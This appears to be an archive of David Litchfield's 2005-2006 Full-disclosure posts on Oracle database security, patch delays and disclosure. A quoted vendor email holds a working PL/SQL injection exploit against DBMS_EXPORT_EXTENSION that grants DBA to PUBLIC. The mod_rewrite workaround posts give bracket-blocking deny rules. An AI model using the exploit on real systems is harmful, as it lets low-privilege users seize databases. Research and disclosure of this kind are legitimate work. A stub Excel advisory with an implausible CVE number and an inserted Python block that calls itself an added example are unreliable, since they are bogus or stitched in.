as database servers? I suppose at a minimum for DB software you could at 
least have a standard that simply checks if the server falls to a long 
username or password buffer overflow attempt and then fuzz SQL-92 language 
elements. It certainly makes standardization much more difficult but I think 
by no means impossible.


Clearly, what is _easy_ is writing and agreeing upon a VAAL:Protocol 
standard for many different types of servers. You could then be assured that 
any server that passes is at least as secure as VAAL:Protocol and for those 
looking for more "comfort" then they can at least block non-RFC compliant 
traffic.


Having had a chat with Steve Christey about this earlier today I know there 
are other people thinking along the same lines and I bet there are more 
projects out there being worked on that are attempting to achieve the same 
thing. If anyone is currently working on this stuff or would like to get 
involved in thrashing out some ideas then please mail me - I'd love to hear 
from you.


Cheers,
David Litchfield
http://www.databasesecurity.com/
http://www.ngssoftware.com/



Re: [Full-disclosure] MS06-019 - How long before this develops into a self propagating email worm

2006-05-11 Thread David Litchfield

> "Thereees zero-day in the wild, you're going to get haxx3d"

It's more like "We now know about a zero-day that's been on the loose
for some unknown amount of time, and you may already be hax0red. And if
you haven't, you probably will be as soon as the script kiddies who are
even more lame than our security professionals find the zero-day. HAND".



Code alone is not a threat. It's obvious these security companies never
have specific intelligence of worms being planned. All they can base
their threat meters on is a generalization.



Which one is the threat:



"A gun store has opened on the corner, someone might buy a gun and shoot"



or



"I overheard a conversation that johnny average is annoyed at bob and
spoke about revenge, he's really into  snip



They both are. The first is, of course, more general and is based upon 
increased _opportunity_. The second is a specific threat based upon specific 
intelligence. Bringing this back to the world of computer security: most 
major Internet worms that use an overflow as their vector have exploited 
previously announced flaws - with a patch being available - for example 
Blaster, Slammer, Code Red. With the current situation, we have increased 
opportunity: that is, there is a pre-authentication attack vector in a 
commonly used product which is not commonly firewalled. In other words, 
almost all the right ingredients for an Internet worm. If past experience 
is anything to go by the only missing ingredient is proof of concept code 
released by a well meaning security researcher!

Cheers,
David Litchfield 




[Full-disclosure] Oracle - the last word

2006-05-09 Thread David Litchfield
A few people have asked me recently what it is I'm actually looking for from 
Oracle. I have a nice little laundry list of things, of course, but mostly 
all I've been waiting for is to hear Oracle to say, "We admit we have a 
problem with regards to security, but here's our strategy and we're going to 
make it better." In that simple admission would lie the cessation of my 
criticism of Oracle. But, let's face it, it's not a simple admission in 
reality. As a business, Oracle can't say, "Oops. We've been mistaken all 
these years - turns out our database isn't as secure as we actually thought." 
A company like Microsoft can, and indeed did, do something just like that but 
their business was never built on what was supposed to be a reputation for 
and a foundation of security. It would be business suicide for Oracle to do 
this.




After much rumination, the obvious struck me: Oracle could make their 
product more secure (and improve the behind-the-scenes processes that enable 
them to deliver a secure product) and all the while admit to nothing. Whilst 
I've been throwing tantrums at their failure to admit to the truth, Oracle 
has been working on doing this. It almost passed me by. They're not there 
yet but they are getting closer. Let me put that in concrete terms: When 
Oracle 10g Release 1 was released you could spend a day looking for bugs and 
find thirty. When 10g Release 2 was released I had to spend two weeks 
looking to find the same number.




Soon, and I have no time frame in mind for "soon", Oracle will have 
"arrived" at a point where sitting down and finding a single bug will take a 
month - and not once would they have had to admit to having problems with 
security. They'll have solved it. Their tools will be tight and their 
processes slick. They'll almost be Unbreakable.




I'm sure the strategists at Oracle must have realized this - for an 
organization such as Oracle it's really the only reasonable option 
available. Okay, it's not the open strategy that I'd have preferred but, in 
the end, the journey of how they got/get there, to a secure robust product, 
is irrelevant.




Another thing that struck me was the amount of effort and time that it must 
have taken to get a lumbering stegosaurus of a beast like Oracle to turn 
around. I can only assume that, as CSO, Mary Ann must be credited with that, 
and as such, I revise my position on her. Dare I say it, well done, Mary.




I realize now that this is how it's going to be - I'm not going to get my 
much sought after admission but at least we get a better, more secure 
product we can be more confident in. Besides, I weary of "Oracle bashing" 
and I've no doubt that I've wearied many here on these lists over the years, 
too. NGS will, of course, continue to research and find Oracle security 
flaws, report them and help Oracle to fix them but, from now on, I'll leave 
the proselytizing to others. Oracle have moved sufficiently forward enough, 
and with enough momentum (now), that I believe they've passed the point of 
no return and can do nothing but eventually end up where we all want them to 
be.




Cheers,

David Litchfield

NGSSoftware Ltd

http://www.ngssoftware.com/

+44(0) 208 401 0070





[Full-disclosure] Oracle, where are the patches???

2006-05-02 Thread David Litchfield
A regular patch release cycle is a good thing. It allows system
administrators to plan ahead and minimize server downtime. If I, as a system
administrator, know that on the 18th of April 2006 a critical patch is going
to be released I'll plan to stay late at work that night and start the
assessment of the patch before I install it. All going well, I can install
the patch and reboot the server all with a minimum amount of downtime. This
should happen once a month or once a quarter - whatever interval my vendor
has chosen. That's what good regular patches allow me to do. The benefits
are absolutely clear.

There are two major problems that can cause these benefits to evaporate into
thin air, however. These are

1) Late Patches - If patches aren't delivered on the day they were supposed
to be, then all my planning ahead has gone to waste and a new plan needs to
be scheduled.
2) Re-issued Patches - If a vendor has to reissue a patch then I have to
reinstall it - which costs me more money and more server downtime. The more
times the patch is re-issued the more it eats into my budget.

Since starting its regular quarterly patch release cycle Oracle has been
guilty of both.

Most recently, Oracle informed us that on the 18th of April 2006 the
Critical Patch Update would be released. This date had been planned for over
a year so why, on that date, were patches not ready for versions 10.2.0.2,
10.1.0.4, 10.1.0.3, 9.2.0.5, 8.1.7.4 and only partial patches for 10.1.0.5?
Further, patches were only available for versions 9.2.0.7, 9.2.0.6 and
10.2.0.1 which means patches are available for only 33% of their supported
versions - what about the poor people running the other 66%?

These 66% were told that their patches would be available on the 1st of May
2006. In all fairness, the 1st of May was an "Estimated Time of Arrival" -
but boy - was that estimate way off! The ETA has now been revised to the
15th of May - a whole month after the supposed patch release day. 

What about Oracle's track record on patch re-issuance? Let's look - the
January 2006 critical patch update was re-issued seven times, the October
2005 CPU three times and the July 2005 CPU was re-issued nine times. The
story is the same for earlier CPUs.

Mary, Mary, quite contrary to what you'd have us believe about Oracle's
security track record, it's not looking too good from my view.

Cheers,
David Litchfield
NGSSoftware Ltd
http://www.ngssoftware.com/
+44 (0) 208 401 0070



[Full-disclosure] Recent Oracle exploit is _actually_ an 0day with no patch

2006-04-26 Thread David Litchfield

The recent Oracle exploit posted to Bugtraq
(http://www.securityfocus.com/archive/1/431353) is actually an 0day and has
no patch. The patch for 10g Release 2 for April 2006 Critical Patch Update
does _not_ contain a fix for the specific flaw that the exploit takes
advantage of. As it happens - this specific flaw was reported to Oracle on
the 19th of February 2006.

It is incredible how, for such a small package, DBMS_EXPORT_EXTENSION has
had so many problems that Oracle have been unable to fix. Let's look at the
history.

On the 13th April 2004 I reported a SQL injection vulnerability to Oracle in
the GET_DOMAIN_INDEX_METADATA function of this package. Oracle released a
"fix" for this in Alert 68 (August 2004) - but it turns out the fix was not
sufficient. I alerted Oracle to this problem on the 18th of February 2005.
They again attempted to fix these flaws - this time in the October 2005 CPU.
On the 30th of October I reported that the problems were still not fixed
properly. They then tried to fix it again in the January 2006 CPU - but
again there were still issues left. I reported this on 19th of February
2006. I was told the April 2006 CPU contained a fix - but it is still
vulnerable. 

At the end of this mail are copies of my communications with Oracle with
regards to the flaws in this package. It is unfortunate that Oracle did not
take the opportunity to fix the flaws first time around. It is amazing
Oracle didn't fix them second time around. It is disgraceful, IMO, that they
didn't fix them properly third time around. 

I call upon Oracle to "pull their finger out" and get on with delivering
their customers a proper patch - one that finally puts these issues to bed.

In the meantime, revoking the PUBLIC execute permission from this package
will help mitigate the risk.

Cheers,
David Litchfield
NGSSoftware Ltd
http://www.ngssoftware.com/
+44(0)208 401 0070




** Oracle's response to 13/04/2004 report **

Thanks David. This will also be investigated. This will be reference number
2004S141E.

Andrew
Oracle Security Alerts


On 04/13/2004 06:17 PM, David Litchfield wrote:
> Howdy,
> The DBMS_EXPORT_EXTENSION owned by SYS is vulnerable to PL/SQL 
> injection that allows a low priv user to become a DBA. It executes a 
> block of anonymous PL/SQL that we can insert something like EXECUTE 
> IMMEDIATE ''grant dba to public'' in.
> 
> DECLARE
> NB PLS_INTEGER;
> BUF VARCHAR2(2000);
> BEGIN
> BUF:=
> SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA('FOO','SCH','FOO',
> 'EXFSYS"."EXPRESSIONINDEXMETHODS".ODCIIndexGetMetadata(oindexinfo,:p3,
> :p4,ENV); EXCEPTION WHEN OTHERS THEN EXECUTE IMMEDIATE ''GRANT DBA TO 
> PUBLIC'';END; --','VER',NB,1); END; /
> 
> When this query runs, the query in GET_DOMAIN_INDEX_METADATA returns 
> 'no data' so we handle the exception using 'when others' and grant dba 
> to public in the exception block.
> 
> Cheers,
> David
> 

** Oracle's response to 18/02/2005 report **

Hi David,

We received four emails from you Friday which we are investigating. You
believe that the issues are more general cases of bugs that were fixed in
Alert 68, but we think at least one issue you reported on Friday is new. We
normally get tracking numbers to you promptly, but these issues are taking
longer because it's unclear if we should re-open the old tracking numbers
(because it is an extension of the old issue) or track as new issues. We
will get back to you with tracking numbers once we have a definitive answer.

I appreciate your patience.

Regards,
Darius Wiles
Security Alerts Manager


David Litchfield sent the following message on 02/23/2005 12:53 PM:
> Just wondering if anyone's there and whether this mail (and the others 
> sent on Friday) were received?
> Cheers,
> David
> - Original Message - From: "David Litchfield" 
> <[EMAIL PROTECTED]>
> To: "'Oracle Security Alerts'" <[EMAIL PROTECTED]>
> Cc: <[EMAIL PROTECTED]>
> Sent: Friday, February 18, 2005 3:52 PM
> Subject: Patch is broken for
> DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA
> 
> 
>> The patch for alert 68 "fixed" the
>> DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA SQL injection 
>> problem; I put "fixed" in quotes because it's not fixed.
>>
>> Here's the original problem:
>>
>> The DBMS_EXPORT_EXTENSION owned by SYS is vulnerable to PL/SQL 
>> injection that allows a low priv user to become a DBA. It executes a 
>> block of anonymous PL/SQL that we can insert something like EXECUTE 
>> IMMEDIATE ''grant dba to public'' in.
>>
>> DECLARE
>&

[Full-disclosure] Multiple critical and high risk issues in Oracle's database server

2006-04-18 Thread David Litchfield
NGSSoftware has discovered multiple critical and high risk vulnerabilities 
in Oracle's Database Server. Versions affected include


Oracle Database 10g Release 2, versions 10.2.0.1, 10.2.0.2
Oracle Database 10g Release 1, versions 10.1.0.4, 10.1.0.5
Oracle9i Database Release 2, versions 9.2.0.6, 9.2.0.7
Oracle8i Database Release 3, version 8.1.7.4

Oracle has released a patch that addresses these issues. The announcement of
this patch can be found here:

http://www.oracle.com/technology/deploy/security/pdf/cpuapr2006.html

Patches can be downloaded from the Metalink website -
http://metalink.oracle.com/.

NGSSoftware are going to withhold details about these flaws for three
months. Full details will be published on the Tuesday, 18th of July 2006.
This three month window will allow Oracle database administrators the time
needed to test and apply the patch set before the details are released to
the general public. This reflects NGSSoftware's approach to responsible
disclosure. Our stated policy can be found here:
http://www.ngssoftware.com/disclosure.pdf


NGSSQuirreL for Oracle, NGSSoftware's advanced vulnerability assessment
scanner and security manager for Oracle, has been updated to check for and
positively identify these flaws in Oracle database servers on the network.
More information about NGSSQuirreL for Oracle can be found at
http://www.ngssoftware.com/squirrelora.htm.

NGSSoftware Insight Security Research
http://www.ngssoftware.com/
+44(0)208 401 0070






[Full-disclosure] Advisory - -Thu Mar 16 14:27:08 EST 2006- - Buffer Overflow in Microsoft Excel

2006-03-16 Thread David Litchfield



Advisory - -Thu Mar 16 14:27:08 EST 2006- - Buffer Overflow in Microsoft Excel





1. BACKGROUND
There has had been no background.

2. WORKAROUND
This vulnerability has no workarounds.

3. CVE INFORMATION
The Common Vulnerabilities and Exposures (CVE) project has assigned the name 
CVE-2006-956531 to this issue.




[Full-disclosure] More on the workaround for the unpatched Oracle PLSQL Gateway flaw

2006-02-02 Thread David Litchfield
According to Oracle, the workaround I posted, that prevents exploitation of 
a critical vulnerability that Oracle has so far failed to fix, breaks 
certain applications that sit atop their PLSQL Gateway. Though my 
workaround prevents exploitation of the critical flaw and thus protects 
vulnerable systems against attack, Oracle has made no effort to furnish me, 
or anyone else for that matter, with more information on how the workaround 
breaks some of their applications. As such, improving the workaround so it 
doesn't break these few applications has been mildly annoying. But I think 
I've tracked it down. The workaround as is


RewriteEngine  on
RewriteCond %{QUERY_STRING} ^.*\).*|.*%29.*$
RewriteRule ^.*$ http://127.0.0.1/denied.htm?attempted-attack
RewriteRule ^.*\).*|.*%29.*$ http://127.0.0.1/denied.htm?attempted-attack

will trigger if a right facing bracket ')' appears in the PATH_INFO or 
_anywhere_ in the query string. Thus, if the value of a query string 
parameter contains a bracket the workaround will trigger. As far as the flaw 
is concerned, we need only concern ourselves with brackets that appear in 
the query string parameter name - not in the value for the parameter name. 
As such, if we modify the workaround to


RewriteEngine  on
RewriteCond %{QUERY_STRING} ^.*\).*=|.*%29.*=$
RewriteRule ^.*$ http://127.0.0.1/denied.htm?attempted-attack
RewriteRule ^.*\).*|.*%29.*$ http://127.0.0.1/denied.htm?attempted-attack

we can prevent exploitation if the query string parameter name has a bracket 
whilst still allowing brackets in the parameter value. This can be tidied up 
to read


RewriteEngine  on
RewriteCond %{QUERY_STRING} \).*=|%29.*=
RewriteRule .? http://127.0.0.1/denied.htm?attempted-attack
RewriteRule \)|%29 http://127.0.0.1/denied.htm?attempted-attack

# Thanks, Mike Pomraning!

For those that haven't been able to adopt the workaround because it would 
break their specific application, then the modified workaround should work 
in your situation.


Cheers,
David Litchfield



[Full-disclosure] The History of the Oracle PLSQL Gateway Flaw

2006-02-02 Thread David Litchfield
to know in
advance everything that is bad and should be black listed. It's a much
easier proposition to know what is not bad though and only allow access to
this. This is a "white list" solution and I've been asking Oracle to give us
a white list solution to this problem for four years now - but they still
haven't done it. Explaining this further - let's say my web plsql
application consists of one package called "banking" and this package has a
number of procedures that implement typical banking tasks such as
"transfer", "pay", "show_balance", etc, etc. If I had a white list solution
then I could say allow access if and only if the web users request starts
with "banking" and reject everything else. This is an entirely much more
secure and robust solution than the "black list" approach.

Will we ever be given this as a solution? Who knows. As it seems providing a
decent security solution is beyond Oracle at the moment - I'm not holding my
breath.


Come on Oracle - get your stuff together!

Cheers,
David Litchfield






[Full-disclosure] Workaround for unpatched Oracle PLSQL Gateway flaw

2006-01-25 Thread David Litchfield

There's a critical flaw in the Oracle PLSQL Gateway, a component of iAS, OAS
and the Oracle HTTP Server, that allows attackers to bypass the
PLSQLExclusion list and gain access to "excluded" packages and procedures.
This can be exploited by an attacker to gain full DBA control of the backend
database server through the web server.

This flaw was reported to Oracle on the 26th of October 2005. On November
the 7th NGS alerted NISCC (http://www.niscc.gov.uk) to the problem. It was
hoped that due to the severity of the problem that Oracle would release a
fix or a workaround for this in the January 2006 Critical Patch Update. They
failed to do so.

The workaround is trivial; using mod_rewrite, which is compiled into
Oracle's Apache distribution it is possible to stop the attack. The
workaround checks a user's web request for the presence of a right facing
bracket, ')'.

Add the following four lines to your http.conf file then stop and restart
the web server

RewriteEngine  on
RewriteCond %{QUERY_STRING} ^.*\).*|.*%29.*$
RewriteRule ^.*$ http://127.0.0.1/denied.htm?attempted-attack
RewriteRule ^.*\).*|.*%29.*$ http://127.0.0.1/denied.htm?attempted-attack

I don't think leaving their customers vulnerable for another 3 months (or
perhaps even longer) until the next CPU is reasonable especially when this
bug is so easy to fix and easy to workaround. Again, I urge all Oracle
customers to get on the 'phone to Oracle and demand the respect you paid
for.

Cheers,
David Litchfield
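The three PLSQL Gateway posts above describe two defensive ideas: the mod_rewrite "black list" that rejects a request when a right-facing bracket appears in a query string parameter name (the original rule fires on a bracket anywhere in the query string, the refined rule only when a bracket is followed by an '='), and the "white list" that would allow a request only when it targets a known package such as "banking". The Python below is an added example, written for this edit and not code from any of the posts or from Oracle: it expresses the two regex variants from the posts as Python regexes over the raw query string, adds a structured check that parses the query string and inspects only decoded parameter names (more precise than either regex, since the refined regex still fires on a bracket in a value that is followed by a later parameter), and implements the allow-list idea. The URL layout it assumes (/pls/<DAD>/<package>.<procedure>) and the package name "banking" are assumptions taken from the posts' own description, not verified against any gateway configuration.

```python
import re
from urllib.parse import parse_qsl, unquote

# The two RewriteCond patterns from the posts, as Python regexes over the raw query string.
ORIGINAL_RULE = re.compile(r"^.*\).*|.*%29.*$")  # a ')' or '%29' anywhere in the query string
REFINED_RULE = re.compile(r"\).*=|%29.*=")       # a ')' or '%29' that is followed by an '='

# Constructed allow list for the "banking" example in the History post (assumption).
ALLOWED_PACKAGES = {"banking"}
# Oracle identifiers, lower-cased; a quoted name such as "x"."y" will not match (assumption).
IDENT = re.compile(r"^[a-z][a-z0-9_$#]*$")


def regex_blocks(query_string, rule=REFINED_RULE):
    """True when the given RewriteCond-style rule would fire on this raw query string."""
    return rule.search(query_string) is not None


def bracket_in_param_name(query_string):
    """Structured version of the refined rule: decode each parameter and look at names only.

    parse_qsl decodes '%29' to ')', so encoded and literal brackets are treated alike,
    and keep_blank_values=True makes a bare 'a)b' (no '=') count as a parameter name.
    """
    for name, _value in parse_qsl(query_string, keep_blank_values=True):
        if ")" in name:
            return True
    return False


def allowed_by_whitelist(path, allowed_packages=ALLOWED_PACKAGES):
    """Allow only /pls/<dad>/<package>.<procedure> where <package> is on the allow list."""
    parts = path.split("/")
    if len(parts) != 4 or parts[1].lower() != "pls":
        return False
    package, sep, procedure = unquote(parts[3]).lower().partition(".")
    return sep == "." and package in allowed_packages and IDENT.match(procedure) is not None


def decide(url, allowed_packages=ALLOWED_PACKAGES):
    """Combine both checks: the allow list first, then the bracket-in-name deny rule."""
    path, _, query = url.partition("?")
    if not allowed_by_whitelist(path, allowed_packages):
        return "deny: target not on allow list"
    if bracket_in_param_name(query):
        return "deny: bracket in parameter name"
    return "allow"


if __name__ == "__main__":
    # Constructed requests: a bracket in a value is fine, a bracket in a name is not.
    for sample in ("/pls/dad/banking.show_balance?acct=(1)",
                   "/pls/dad/banking.show_balance?a)b=1",
                   "/pls/dad/other.proc"):
        print(sample, "->", decide(sample))
```

The regex comparison shows why the refined rule was needed and where it still over-blocks: "p=a)b" is rejected by the original rule but passed by the refined one, while "p=a)b&q=2" is rejected by the refined rule even though the bracket sits in a value, which the parsing check gets right. The allow list is deliberately strict (exactly four path segments, one package, one plain identifier) because the whole point of the white-list approach is to reject anything that is not known good rather than to enumerate what is bad.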




[Full-disclosure] AIX Heap Overflow paper

2005-12-15 Thread David Litchfield
I've just published a paper on AIX heap overflows. I wrote it back in August 
but wanted to wait until a couple of flaws I discovered whilst researching 
the topic were fixed by IBM. IBM released the patches today. You can get the 
paper at http://www.databasesecurity.com/dbsec/aix-heap.pdf

Cheers,
David Litchfield




[Full-disclosure] Snagging Security Tokens to Elevate Privileges

2005-11-18 Thread David Litchfield
I've just put up a Database Security Brief; the first of many to come.

http://www.databasesecurity.com/dbsec-briefs.htm

It's called a brief because there's enough meat to make it interesting but
not enough to make it a paper ;)

This brief, Snagging Security Tokens to Elevate Privileges, details how a
database server running as a low privileged user on Windows can still
provide an attacker with the ability to gain elevated privileges on the
network and suggests a change in security policy to mitigate the risk. As a
side note, this affects all network servers that offer OS based
authentication - not just database servers.

Cheers,
David





Re: [Full-disclosure] Framework for the aid of exploiting SQL injection

2005-11-17 Thread David Litchfield

Hi Roman,

Is there any recommended tool which helps to get databases tables,
entries, structure, etc, given a particular SQL injection bug in one
application? I mean, it should *automatically* try different sentences
to figure out the names of the columns and in general, other useful info
from the database. Perhaps a PoC of some of NGSSoftware's papers or a
more elaborated tool...


I've just put up sqlinjector.zip on the databasesecurity.com website ( 
http://www.databasesecurity.com/webapplications.htm ). This is the tool 
(source and exe) you refer to. I never got around to completing it but it 
works as is - I'd rather the code was tidier.

HTH,
David



Re: [Full-disclosure] Database servers on XP and the curious flaw

2005-11-16 Thread David Litchfield

Hi Eliah,


David Litchfield wrote:

Hey all,
I've just put up a paper on a curious flaw that appears when running a



My intent is not to MS-bash here, but perhaps Microsoft is to blame
for not educating people about this issue. (If they had, your paper
would be superfluous.)



Usually if millions of users are insecure because they don't know
something, someone is to blame.


To be honest I don't think we're talking millions of people. How many people 
at home run a fully fledged RDBMS on their XP systems? Very few I'd guess. 
Besides, Simple File Sharing is documented so MS are educating those willing 
to seek information.


Cheers,
David
http://www.databasesecurity.com/
http://www.ngssoftware.com/




[Full-disclosure] Database servers on XP and the curious flaw

2005-11-16 Thread David Litchfield
Hey all,
I've just put up a paper on a curious flaw that appears when running a
database server on Windows XP with Simple File Sharing enabled. The flaw
essentially allows a remote attacker to gain access to the database,
sometimes with DBA privileges, without knowledge of a valid password. To be
honest, no-one is really to blame; it's just one of those cases where you
take two disparate mechanisms, shake them up, add a dash of lime and serve
up. The paper can be found here
http://www.databasesecurity.com/dbsec-papers.htm and is entitled "Database
Servers on Windows XP and the Unintended Consequences of Simple File
Sharing". It doubles-up as my entry for the "Longest Title" award.
Cheers,
David Litchfield
http://www.databasesecurity.com/
http://www.ngssoftware.com/




Re: [Full-disclosure] Not the real n3td3v

2005-11-15 Thread David Litchfield

Will the real n3td3v please stand up, please stand up?

... couldn't resist... sorry

David


[Full-disclosure] Three years and ten months without a patch

2005-11-15 Thread David Litchfield
Whilst looking over old Oracle bugs I discovered that a _fully_ _patched_
8.1.7.4 Oracle server is still vulnerable to the old extproc flaw
[http://www.ngssoftware.com/advisories/oraplsextproc.txt]; this flaw, when
exploited, allows a remote attacker without a userID and password to take
control of the server. Why, you may ask, has a supported product gone for so
long without a patch for a serious problem that was made public 3 years and
10 months ago and reported to Oracle over 4 years ago? The answer, according
to Alert 57
[http://www.oracle.com/technology/deploy/security/pdf/2003alert57.pdf], is
that Oracle outright decided not to fix it. They claim "architectural
constraints" are the problem even though they managed to overcome these same
constraints on newer versions of Oracle. 

Users of 8.1.7.4 would do well to heed the advice offered in Alert 57 if
they've not already done so.

Cheers,
David Litchfield
http://www.databasesecurity.com/
http://www.ngssoftware.com/

More commentary on this available here
http://www.databasesecurity.com/oracle-commentary.htm



[Full-disclosure] Re: [AppSecInc Advisory MYSQL05-V0002] Buffer Overflow in MySQL User Defined Functions

2005-08-08 Thread David Litchfield

Buffer Overflow in MySQL User Defined Functions
Risk level: LOW
Credits: This vulnerability was discovered and researched by Reid
Borsuk of Application Security Inc.


How can this even be marked as low risk? If you're loading a library into 
mysql's address space then you're already executing "arbitrary code". It's 
important that we, as security researchers, don't desensitize the readership 
with pointless "vulnerability" posts otherwise people begin to turn off. 
Sure - you've found some sloppy code in mysql - get it looked at by all 
means but please don't try to create a risk, whether low or not, where there 
really is none.


Cheers,
David "got out of the wrong side of bed this morning" Litchfield 

